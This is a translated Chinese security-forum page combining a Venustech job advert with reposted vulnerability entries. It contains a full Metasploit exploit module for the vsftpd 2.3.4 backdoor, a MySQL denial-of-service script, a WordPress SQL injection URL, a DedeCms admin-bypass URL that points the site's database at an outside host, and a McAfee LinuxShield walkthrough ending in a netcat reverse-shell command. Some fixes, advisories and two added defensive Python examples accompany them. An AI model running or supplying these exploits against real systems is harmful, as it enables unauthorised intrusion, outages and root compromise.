
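[Recruitment] [Hiring] Venustech (启明星辰) R&D hiring

  • Position: Other
  • Company: Venustech (启明星辰)
  • Location: Beijing
  • Major required: Other
  • Education required: Bachelor's degree
  • Work experience: 2+ years
  • Salary: Negotiable
  • Age requirement: None
  • Gender requirement: None
  • Company website: http://www.venustech.com.cn
  • Résumé e-mail: xiaoyan@sitedirsec.com
  • Phone: 00000000000
  • Online QQ:
  • Safety assistant: Recruit or apply through 非安全中国 administrators, QQ group: 57116771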


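  • ++++++++++ Notes about Venustech (启明星辰) ++++++++++

    Just send me a private message on the site.

    I. R&D Center: Linux C Software Engineer (several openings)

    Responsibilities:

    1. Develop and maintain software for embedded devices such as security gateways, firewalls and IPS

    Requirements:

    1. Proficient in C programming
    2. Skilled with the Linux operating system; proficient in C programming on Linux
    3. Proficient in TCP/IP and other network protocols; familiar with application-layer protocols and protocol analysis
    4. Familiar with network security protocols and with security devices such as routers, switches and firewalls
    5. Familiar with the Linux kernel and kernel development

    II. R&D Center: Test Engineer (several openings)

    Responsibilities:

    1. System testing and integration testing of products
    2. Writing, executing and revising product test cases
    3. Product performance testing
    4. Support and testing for external projects

    Requirements:

    1. Basic TCP/IP knowledge
    2. Solid data-communications fundamentals
    3. Some Linux background
    4. Able to set up and use databases
    5. Familiar with at least one programming language: C/Perl/VBS/TCL
    6. Familiar with test case design, system testing and stress testing
    7. Familiar with firewall principles, with some understanding of firewall features
    8. Some understanding of how network security devices are deployed in a network
    9. Able to use test tools: Loadrunner, packet analysis software, Spirent or IXIA testers

    III. R&D Center: Security Event Engineer (several openings)

    Responsibilities:

    1. Delivering trojan detection services and web vulnerability scanning services
    2. Technical support for service customers
    3. Research on web-page trojans, web vulnerabilities, worms, scanning, denial of service, buffer overflows and similar topics
    4. Routine upgrade and maintenance of the security event libraries for products such as IDS/IPS/UTM/TDS/WAG/322
    5. Research on attack techniques, on the TCP/IP protocols, and on reverse engineering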

    Posted by: 小妍

    VSFTPD v2.3.4 Backdoor command execution vulnerability

    ##
    # $Id: vsftpd_234_backdoor.rb 13099 2011-07-05 05:20:47Z hdm $
    ##

    ##
    # This file is part of the Metasploit Framework and may be subject to
    # redistribution and commercial restrictions. Please see the Metasploit
    # Framework web site for more information on licensing and terms of use.
    # http://metasploit.com/framework/
    ##

    require 'msf/core'

    class Metasploit3 < Msf::Exploit::Remote
      Rank = ExcellentRanking

      include Msf::Exploit::Remote::Tcp

      def initialize(info = {})
        super(update_info(info,
          'Name'           => 'VSFTPD v2.3.4 Backdoor Command Execution',
          'Description'    => %q{
              This module exploits a malicious backdoor that was added to the VSFTPD download
              archive. This backdoor was introduced into the vsftpd-2.3.4.tar.gz archive between
              June 30th 2011 and July 1st 2011 according to the most recent information
              available. This backdoor was removed on July 3rd 2011.
          },
          'Author'         => [ 'hdm', 'mc' ],
          'License'        => MSF_LICENSE,
          'Version'        => '$Revision: 13099 $',
          'References'     =>
            [
              [ 'URL', 'http://pastebin.com/AetT9sS5' ],
              [ 'URL', 'http://scarybeastsecurity.blogspot.com/2011/07/alert-vsftpd-download-backdoored.html' ],
            ],
          'Privileged'     => true,
          'Platform'       => [ 'unix' ],
          'Arch'           => ARCH_CMD,
          'Payload'        =>
            {
              'Space'       => 2000,
              'BadChars'    => '',
              'DisableNops' => true,
              'Compat'      =>
                {
                  'PayloadType'    => 'cmd_interact',
                  'ConnectionType' => 'find'
                }
            },
          'Targets'        =>
            [
              [ 'Automatic', { } ],
            ],
          'DisclosureDate' => 'Jul 3 2011',
          'DefaultTarget'  => 0))

        register_options([ Opt::RPORT(21) ], self.class)
      end

      def exploit

        nsock = self.connect(false, {'RPORT' => 6200}) rescue nil
        if nsock
          print_status("The port used by the backdoor bind listener is already open")
          handle_backdoor(nsock)
          return
        end

        # Connect to the FTP service port first
        connect

        banner = sock.get_once(-1, 30).to_s
        print_status("Banner: #{banner.strip}")

        sock.put("USER #{rand_text_alphanumeric(rand(6)+1)}:)\r\n")
        resp = sock.get_once(-1, 30).to_s
        print_status("USER: #{resp.strip}")

        if resp =~ /^530 /
          print_error("This server is configured for anonymous only and the backdoor code cannot be reached")
          disconnect
          return
        end

        if resp !~ /^331 /
          print_error("This server did not respond as expected: #{resp.strip}")
          disconnect
          return
        end

        sock.put("PASS #{rand_text_alphanumeric(rand(6)+1)}\r\n")

        # Do not bother reading the response from password, just try the backdoor
        nsock = self.connect(false, {'RPORT' => 6200}) rescue nil
        if nsock
          print_good("Backdoor service has been spawned, handling...")
          handle_backdoor(nsock)
          return
        end

        disconnect

      end

      def handle_backdoor(s)

        s.put("id\n")

        r = s.get_once(-1, 5).to_s
        if r !~ /uid=/
          print_error("The service on port 6200 does not appear to be a shell")
          disconnect(s)
          return
        end

        print_good("UID: #{r.strip}")

        s.put("nohup " + payload.encoded + " >/dev/null 2>&1")
        handler(s)
      end

    end
    Announcement: https://www.sitedirsec.com publishes the latest vulnerabilities; please follow.

    WordPress Event List Plugin <= 0.7.8 - SQL injection vulnerability

    1. Description:

    SQL injection vulnerability in the Event List plugin 0.7.8 for WordPress
    allows an authenticated user to execute arbitrary SQL commands via the id
    parameter to wp-admin/admin.php.

    2. Proof of Concept:

    http://[wordpress_site]/wp-admin/admin.php?page=el_admin_main&action=edit&id=1 AND SLEEP(10)

    3. Solution:

    The plugin has been removed from WordPress. Deactivate the plug-in and wait
    for a hotfix.

    4. Reference:

    http://dtsa.eu/cve-2017-9429-event-list-version-v-0-7-8-blind-based-sql-injection-sqli/
    http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=2017-9429

    MySQL 5.5.8 remote denial-of-service vulnerability

    # Python 2 script
    import socket, sys

    print "\n"
    print "----------------------------------------------------------------"
    print "| MySQL 5.5.8 Null Ptr (windows)                                |"
    print "| Level Smash the Stack                                         |"
    print "----------------------------------------------------------------"
    print "\n"

    buf=("&\x00\x00\x01\x85\xa2\x03\x00\x00\x00\x00@\x93\x00\x00\x00\x00\x00\x00\x00\x00"
    "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00root\x00\x00")

    buf2=("\x11\x00\x00\x00\x03set autocommit30")

    def usage():
        print "usage : ./mysql.py <victim_ip>"
        print "example: ./mysql.py 192.168.1.22"

    def main():
        if len(sys.argv) != 2:
            usage()
            sys.exit()
        s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)

        HOST = sys.argv[1]
        PORT = int(3306)
        s.connect((HOST,PORT))
        print "\n[*] Connect"
        s.send(buf)
        print "\n[*] Payload 1 sent"
        s.send(buf2)
        print "\n[*] Payload 2 sent\n", "\n[*] Run again to ensure it is down..\n"
        s.close()

    if __name__ == "__main__":
        main()

    Step-by-step Linux installation: setting up the virtual machine

    http://www.sitedir.com.cn/video/4.swf

    DedeCms (织梦) v5.6-5.7 unauthorized access vulnerability
    http://www.XXXX.com/[DedeCms admin directory]/login.php?dopost=login&validate=dcug&userid=admin&pwd=inimda&_POST[GLOBALS][cfg_dbhost]=116.255.183.90&_POST[GLOBALS][cfg_dbuser]=root&_POST[GLOBALS][cfg_dbpwd]=r0t0&_POST[GLOBALS][cfg_dbname]=root

    Change validate=dcug above to the current CAPTCHA value and you go straight into the site's admin back end.

    The precondition for this vulnerability is that the admin back-end path must be known.

    Official temporary fix:

    In include/common.inc.php, replace:

        foreach($_REQUEST as $_k=>$_v)
        {
            var_dump($_k);
            if( strlen($_k)>0 && preg_match('#^(cfg_|GLOBALS)#',$_k) )
            {
                exit('Request var not allow!');
            }
        }

    with:

        // Check and register externally submitted variables
        function CheckRequest(&$val) {
            if (is_array($val)) {
                foreach ($val as $_k=>$_v) {
                    CheckRequest($_k);
                    CheckRequest($val[$_k]);
                }
            } else
            {
                if( strlen($val)>0 && preg_match('#^(cfg_|GLOBALS)#',$val) )
                {
                    exit('Request var not allow!');
                }
            }
        }
        CheckRequest($_REQUEST);
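Why the flat loop in the DedeCms post lets the nested `_POST[GLOBALS][cfg_...]` parameters through while the recursive `CheckRequest()` stops them, shown as a Python model of the two PHP checks. This is an added example, not DedeCms code or code from the original post; the function names, the simplified PHP-style bracket parser and the sample query strings are constructed for illustration.

```python
import re
from urllib.parse import parse_qsl

BLOCKED = re.compile(r"^(cfg_|GLOBALS)")  # same pattern as both PHP checks


def php_style_params(query):
    """Parse a query string into nested dicts the way PHP fills $_REQUEST:
    a[b][c]=v becomes {"a": {"b": {"c": "v"}}}. Simplified: no a[] lists."""
    root = {}
    for raw_key, value in parse_qsl(query, keep_blank_values=True):
        head, bracket, rest = raw_key.partition("[")
        path = [head]
        if bracket:
            path += re.findall(r"\[([^\]]*)\]", bracket + rest)
        node = root
        for part in path[:-1]:
            nxt = node.get(part)
            if not isinstance(nxt, dict):
                nxt = node[part] = {}
            node = nxt
        node[path[-1]] = value
    return root


def flat_check(params):
    """Model of the original foreach loop: only top-level keys are tested."""
    return [k for k in params if len(k) > 0 and BLOCKED.search(k)]


def recursive_check(value, path=""):
    """Model of CheckRequest(): walks arrays, testing every key and every
    scalar value. Returns all offending locations (PHP exits on the first)."""
    hits = []
    if isinstance(value, dict):
        for k, v in value.items():
            here = f"{path}[{k}]" if path else k
            if BLOCKED.search(k):
                hits.append(here)
            hits.extend(recursive_check(v, here))
    elif len(value) > 0 and BLOCKED.search(value):
        hits.append(f"{path} (value)")
    return hits


# Constructed requests modelled on the URL in the post; host and user replaced.
DIRECT = "dopost=login&cfg_dbhost=db.example.invalid"  # the old loop catches this
NESTED = ("dopost=login&userid=admin"
          "&_POST[GLOBALS][cfg_dbhost]=db.example.invalid"
          "&_POST[GLOBALS][cfg_dbuser]=someone")

if __name__ == "__main__":
    for name, qs in (("direct", DIRECT), ("nested", NESTED)):
        params = php_style_params(qs)
        print(name, "| flat:", flat_check(params),
              "| recursive:", recursive_check(params))
```

In the nested request the only top-level key is `_POST`, which does not match `^(cfg_|GLOBALS)`, so the flat loop reports nothing; the recursive walk reaches `GLOBALS` and the `cfg_` keys beneath it.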

    Step-by-step Linux installation: setting up the virtual machine tools

    http://www.sitedir.com.cn/video/8.swf

    Multiple security vulnerabilities in the Django framework
    Published: 2011-09-12

    Affected versions:
    Django 1.2.5
    Django 1.3 beta 1
    Django 1.2.4
    Django 1.2.2
    Django 1.2

    Description:

    Django is an open-source web application framework written in Python.
    Django has multiple security vulnerabilities that allow an attacker to obtain sensitive information, manipulate data, carry out cache poisoning attacks, or cause denial of service.
    1) When a cache back end is used, django.contrib.sessions handles sessions incorrectly, which can be exploited to manipulate session information. Successful exploitation requires a known session key and an application that lets the attacker store dictionary-like objects in the cache under a valid session key.
    2) The Django model system includes a field type, URLField, that validates whether a supplied value is a valid URL. If the boolean keyword argument verify_exists is true, it tries to verify the supplied URL and resolve it. By default the underlying socket has no timeout, so an attacker can send a crafted URL to consume all server memory, causing denial of service.
    3) Redirect responses are handled incorrectly when URLs supplied to a "URLField" field are verified; an attacker can have the redirect response point to a "file://" URL and so determine whether local files exist on the server.
    4) The "X-Forwarded-Host" HTTP header is handled incorrectly when full-path URLs for redirect responses are generated; an attacker can use this for cache poisoning.

    Details:
    https://www.djangoproject.com/weblog/2011/sep/09/security-releases-issued/
    http://secunia.com/advisories/45939/

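A URL existence check that closes the two gaps described in items 2 and 3 of the Django post: a finite socket timeout, and no redirect out of http/https. This is an added example, not Django's fix or code from the original post; `url_exists`, `HttpOnlyRedirects` and the 5-second timeout are assumptions made for the illustration.

```python
import urllib.error
import urllib.request
from urllib.parse import urlsplit

ALLOWED_SCHEMES = {"http", "https"}
TIMEOUT_SECONDS = 5  # assumption: any finite value closes the no-timeout gap


def scheme_allowed(url):
    """True only for http:// and https:// URLs."""
    return urlsplit(url).scheme.lower() in ALLOWED_SCHEMES


class HttpOnlyRedirects(urllib.request.HTTPRedirectHandler):
    """Follow a redirect only while the new location is still http(s).

    Current CPython already refuses file:// redirect targets on its own;
    this handler makes the policy explicit and also drops ftp://.
    """
    max_redirections = 3

    def redirect_request(self, req, fp, code, msg, headers, newurl):
        if not scheme_allowed(newurl):
            raise urllib.error.URLError(
                f"redirect to disallowed scheme: {newurl!r}")
        return super().redirect_request(req, fp, code, msg, headers, newurl)


def url_exists(url, opener=None):
    """Return True if a HEAD request succeeds, False on refusal or failure."""
    if not scheme_allowed(url):
        return False  # never hand file:// (or anything else) to the opener
    opener = opener or urllib.request.build_opener(HttpOnlyRedirects)
    req = urllib.request.Request(url, method="HEAD")
    try:
        # The explicit timeout bounds connect and read time per request.
        with opener.open(req, timeout=TIMEOUT_SECONDS):
            return True
    except (urllib.error.URLError, OSError, ValueError):
        return False


if __name__ == "__main__":
    # Constructed inputs; none of these calls touch the network.
    print(url_exists("file:///etc/passwd"))   # False: refused up front
    handler = HttpOnlyRedirects()
    origin = urllib.request.Request("http://example.invalid/start")
    try:
        handler.redirect_request(origin, None, 302, "Found", {},
                                 "file:///etc/passwd")
    except urllib.error.URLError as exc:
        print("redirect refused:", exc.reason)
```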

    McAfee LinuxShield local/remote code execution vulnerability
    McAfee LinuxShield remote/local code
    Affected versions: McAfee LinuxShield <= 1.5.1
    Remote exploit: Yes
    Local exploit: Yes
    Background:
    ===========

    LinuxShield detects and removes viruses and other potentially unwanted
    software on Linux-based systems. LinuxShield uses the powerful McAfee
    scanning engine - the engine common to all our
    anti-virus products.

    Although a few years ago, the Linux operating system was considered a
    secure environment, it is now seeing more occurrences of software
    specifically written to attack or exploit security weaknesses in
    Linux-based systems. Increasingly, Linux-based systems interact with
    Windows-based computers. Although viruses written to attack Windows-
    based systems do not directly attack Linux systems, a Linux server
    can harbor these viruses, ready to infect any client that connects to
    it.

    When installed on your Linux systems, LinuxShield provides protection
    against viruses, Trojan horses, and other types of potentially
    unwanted software.

    LinuxShield scans files as they are opened and closed - a technique
    known as on-access scanning. LinuxShield also incorporates an
    on-demand scanner that enables you to scan any directory or file in
    your host at any time.

    When kept up-to-date with the latest virus-definition (DAT) files,
    LinuxShield is an important part of your network security. We
    recommend that you set up an anti-virus security policy for your
    network, incorporating as many protective measures as possible.

    LinuxShield uses a web-browser interface, and a large number of
    LinuxShield installations can be centrally controlled by ePolicy
    Orchestrator.

    (Product description from LinuxShield Product Guide)

    Description:
    ============

    This vulnerability allows remote attackers to execute arbitrary code
    on vulnerable installations of McAfee LinuxShield. User interaction
    is not required to exploit this vulnerability but an attacker must
    be authenticated.

    The LinuxShield Webinterface communicates with the locally installed
    "nailsd" daemon, which listens on port 65443/tcp, to do configuration
    changes, query the configuration and execute tasks.

    Each user, which can login to the victim box, can also authenticate
    itself to the "nailsd" and can do configuration changes and execute
    tasks with root privileges.

    A direct execution of commands is not possible, but it is possible to
    download and execute code through manipulation of the config and
    execute schedule tasks of the LinuxShield.

    walk-through (after the TLS handshake):
    +--------------------------------------

    nailsd > +OK welcome to the NAILS Statistics Service
    attacker> auth <user> <pass>
    nailsd > +OK successful authentication

    # Set the Attacker repository to download our code from a httpd
    # (catalog.z)
    #---------------------------------------------------------------
    attacker> db set 1 _table=repository status=1 siteList=<?xml version
    ="1.0" encoding="UTF-8"?><ns:SiteLists
    xmlns:ns="naSiteLi
    st" GlobalVersion="20030131003110"
    LocalVersion="20091209
    161903" Type="Client"><SiteList
    Default="1" Name="SomeGU
    ID"><HttpSite Type="repository"
    Name="EvilRepo" Order="1
    " Server="<attackerhost>:80"
    Enabled="1" Local="1"><Rela
    tivePath>nai</RelativePath><UseAuth>0</UseAuth><Use
    rName></
    UserName><Password
    Encrypted="0"/></HttpSite></SiteList></
    ns:SiteLists> _cmd=update
    nailsd > +OK database changes buffered.

    # Execute task to set the attacker repository
    #---------------------------------------------------------------
    attacker> task setsitelist
    nailsd > +OK setting sitelist from CMA.

    # Execute the default Update task to download the code
    #---------------------------------------------------------------
    attacker> task nstart LinuxShield Update
    nailsd > +OK task LinuxShield Update starting

    # Create a Scan profile, which executes our code. The profiles are
    # not stored in the database.
    # Scan Profiles: /var/opt/NAI/LinuxShield/etc/ods.cfg
    #---------------------------------------------------------------
    attacker> sconf ODS_99 begin
    nailsd > +OK 1260400888

    # Set the variable "nailsd.profile.ODS_99.scannerPath" to the path
    # where our earlier downloaded catalog.z file is stored.
    # (/opt/McAfee/cma/scratch/update/catalog.z)
    #---------------------------------------------------------------
    attacker> sconf ODS_99 set 1260400888 nailsd.profile.ODS_99.allFiles=
    true nailsd.profile.ODS_99.childInitTmo=60 nailsd.profile.O
    DS_99.cleanChildren=2 nailsd.profile.ODS_99.cleansPerChild=
    10000 nailsd.profile.ODS_5.datPath=/opt/NAI/LinuxShield/eng
    ine/dat nailsd.profile.ODS_99.decompArchive=true nailsd.pro
    file.ODS_99.decompExe=true nailsd.profile.ODS_99.engineLibD
    ir=/opt/NAI/LinuxShield/engine/lib nailsd.profile.ODS_99.en
    ginePath=/opt/NAI/LinuxShield/engine/lib/liblnxfv.so nailsd
    .profile.ODS_99.factoryInitTmo=60 nailsd.profile.ODS_99.heu
    risticAnalysis=true nailsd.profile.ODS_99.macroAnalysis=tru
    e nailsd.profile.ODS_99.maxQueSize=32 nailsd.profile.ODS_99
    .mime=true nailsd.profile.ODS_99.noJokes=false nailsd.profi
    le.ODS_99.program=true nailsd.profile.ODS_99.quarantineChil
    dren=1 nailsd.profile.ODS_99.quarantineDirectory=/quarantin
    e nailsd.profile.ODS_99.quarantinesPerChild=10000 nailsd.pr
    ofile.ODS_99.scanChildren=2 nailsd.profile.ODS_99.scanMaxTm
    o=301 nailsd.profile.ODS_99.scanNWFiles=true nailsd.profile
    .ODS_99.scanOnRead=true nailsd.profile.ODS_99.scanOnWrite=t
    rue nailsd.profile.ODS_99.scannerPath=/opt/McAfee/cma/scrat
    ch/update/catalog.z nailsd.profile.ODS_99.scansPerChild=100
    00 nailsd.profile.ODS_99.slowScanChildren=0 nailsd.profile.
    ODS_99.filter.0.type=exclude-path nailsd.profile.ODS_99.fil
    ter.0.path=/proc nailsd.profile.ODS_99.filter.0.subdir=true
    nailsd.profile.ODS_99.filter.extensions.mode=all nailsd.pr
    ofile.ODS_99.filter.extensions.type=extension nailsd.profil
    e.ODS_99.action.Default.primary=Clean nailsd.profile.ODS_99
    .action.Default.secondary=Quarantine nailsd.profile.ODS_99.
    action.App.primary=Clean nailsd.profile.ODS_99.action.App.s
    econdary=Quarantine nailsd.profile.ODS_99.action.timeout=Pa
    ss nailsd.profile.ODS_99.action.error=Block
    nailsd > +OK configuration changes buffered
    attacker> sconf ODS_99 commit 1260400888
    nailsd > +OK configuration changes stored

    # Set a scan task with the manipulated profile to execute the code
    #---------------------------------------------------------------
    attacker> db set 1260400888 _table=schedule taskName=Evil Task taskTy
    pe=On-Demand taskInfo=profileName=ODS_99,paths=path:/root/t
    mp;exclude:false timetable=type=unscheduled taskResults=0 i
    _lastRun=1260318482 status=Stopped _cmd=insert
    nailsd > +OK database changes buffered

    # Execute scan task to execute the code
    #---------------------------------------------------------------
    attacker> task nstart Evil Task

    +-------------------------------------- walk-through EOF

    To get a reverse root shell place something like this in the catalog.z

    --- snip ---
    #!/bin/sh
    nc -nv <attacker_host> 4444 -e /bin/sh
    --- /snip ---

    Proof of Concept :
    ==================

    http://inj3ct0r.com/sploits/11165.tar.gz

    Solution:
    =========

    McAfee Advisory
    +--------------
    https://kc.mcafee.com/corporate/index?page=content&id=SB10007

    Disclosure Timeline (YYYY/MM/DD):
    =================================

    2009.12.07: Vulnerability found
    2010.02.03: Asked vendor for a PGP key
    2010.02.05: Vendor sent his PGP key
    2010.02.05: Sent PoC, Advisory, Disclosure policy and planned disclosure
    date (2010.02.18) to Vendor
    2010.02.05: Vendor acknowledges the reception of the advisory
    2010.02.16: Ask for a status update, because the planned release date is
    2010.02.18.
    2010.02.16: Vendor response that, they are currently working on a patch
    2010.02.17: Changed release date to 2010.02.25.
    2010.02.22: Vendor gives a status update, that they are able to release
    the patch on 2010.02.25.
    2010.02.24: Ask for a list of affected products and the advisory url.
    2010.02.24: Vendor sends the list.
    2010.03.02: Release of this Advisory
